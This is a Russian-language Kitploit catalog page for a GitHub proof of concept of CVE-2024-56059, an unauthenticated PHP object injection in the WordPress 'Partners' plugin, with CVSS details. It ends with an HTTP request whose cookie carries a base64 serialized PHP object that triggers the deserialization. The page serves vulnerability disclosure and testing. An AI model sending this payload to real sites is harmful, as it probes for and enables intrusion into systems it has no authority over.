Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-56059 — Partners <= 0.2.0 - Внедрение PHP-объектов без аутентификации | Kitploit
Инструменты/GitHubGitHub/randomrobbiebf/cve-2024-56059
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubrandomrobbiebf/cve-2024-56059

CVE-2024-56059

Partners <= 0.2.0 - Внедрение PHP-объектов без аутентификации

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-56059

Partners <= 0.2.0 - PHP Object Injection без аутентификации

Описание

Плагин Partners для WordPress уязвим к PHP Object Injection в версиях до 0.2.0 включительно из-за десериализации недоверенных входных данных. Это позволяет неаутентифицированным атакующим внедрить PHP-объект. В уязвимом программном обеспечении отсутствует известная POP-цепочка. Если POP-цепочка присутствует через дополнительный плагин или тему, установленные в целевой системе, это может позволить атакующему удалять произвольные файлы, получать конфиденциальные данные или выполнять код.

Детали

  • Тип: плагин
  • Slug: partners
  • Затронутая версия: 0.2.0
  • Оценка CVSS: 9.8
  • Рейтинг CVSS: Критический
  • Вектор CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-56059
  • Статус: Активен

POC

root@kitploit:~
GET /partners/ HTTP/1.1
Host: kubernetes.docker.internal:8929
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: mighty_partners_login=TzoyMDoiUEhQX09iamVjdF9JbmplY3Rpb24iOjA6e30=
Скачать инструмент